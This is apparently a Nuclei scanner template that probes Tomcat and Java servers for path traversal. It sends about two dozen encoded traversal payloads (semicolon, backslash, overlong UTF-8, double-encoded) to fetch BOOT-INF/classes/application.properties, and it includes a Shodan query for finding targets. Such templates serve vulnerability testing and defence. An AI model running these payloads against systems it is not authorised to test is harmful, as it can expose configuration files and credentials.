id: java_server_traversal_properties

info:
  name: Tomcat / Java Server Path Traversal Detection_properties
  author: xandsz
  severity: medium
  description: |
    Detects path traversal vulnerabilities in Tomcat and Java-based servers
    by attempting to access BOOT-INF/classes/application.properties using multiple traversal encodings.
  metadata:
    max-request: 30
    shodan-query: 'product:"Apache Tomcat"'
  tags: tomcat,java,path-traversal,webxml

http:
  - method: GET
    path:

      # Basic traversal
      - "{{BaseURL}}/../BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/../../BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/../../../BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/../../../../BOOT-INF/classes/application.properties"

      # Tomcat bypass using semicolon /..;/
      - "{{BaseURL}}/..;/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/..;/..;/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/..;/../../BOOT-INF/classes/application.properties"

      # Encoded backslash
      - "{{BaseURL}}/%5C../BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/%5C../%5C../BOOT-INF/classes/application.properties"

      # Double semicolon
      - "{{BaseURL}}/;/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/;;/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/;;/../../BOOT-INF/classes/application.properties"
      # Dot bypass
      - "{{BaseURL}}/./../../BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/demo/../BOOT-INF/classes/application.properties"

      # Normalized traversal used in exploits
      - "{{BaseURL}}/js/app/../../BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/js/app/1/../../BOOT-INF/classes/application.properties"

      # Unicode traversal (%c0%ae = overlong encoded dot)
      - "{{BaseURL}}/%c0%ae/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/%c0%ae%c0%ae/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/BOOT-INF/classes/application.properties"

      # Double-encoding unicode (%25c0%25ae = encoded %)
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/BOOT-INF/classes/application.properties"

      # Overlong UTF-8 payloads known from tomcat CVE studies
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/BOOT-INF/classes/application.properties"

      # Struts / weird normalization test cases
      - "{{BaseURL}}/wiki/struts/..%252f..%252f/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/..%252f..%252f..%252f/BOOT-INF/classes/application.properties"
      - "{{BaseURL}}/..%252f..%252f/BOOT-INF/classes/application.properties"

    stop-at-first-match: true

    matchers-condition: and
    matchers:

      # BOOT-INF/classes/application.properties content indicators
      - type: word
        part: body
        condition: or
        words:
          - "spring."
          - "server.port"
          - "spring.datasource"
          - "application.name"

      # Expected status codes for traversal attempt
      - type: status
        status:
          - 200
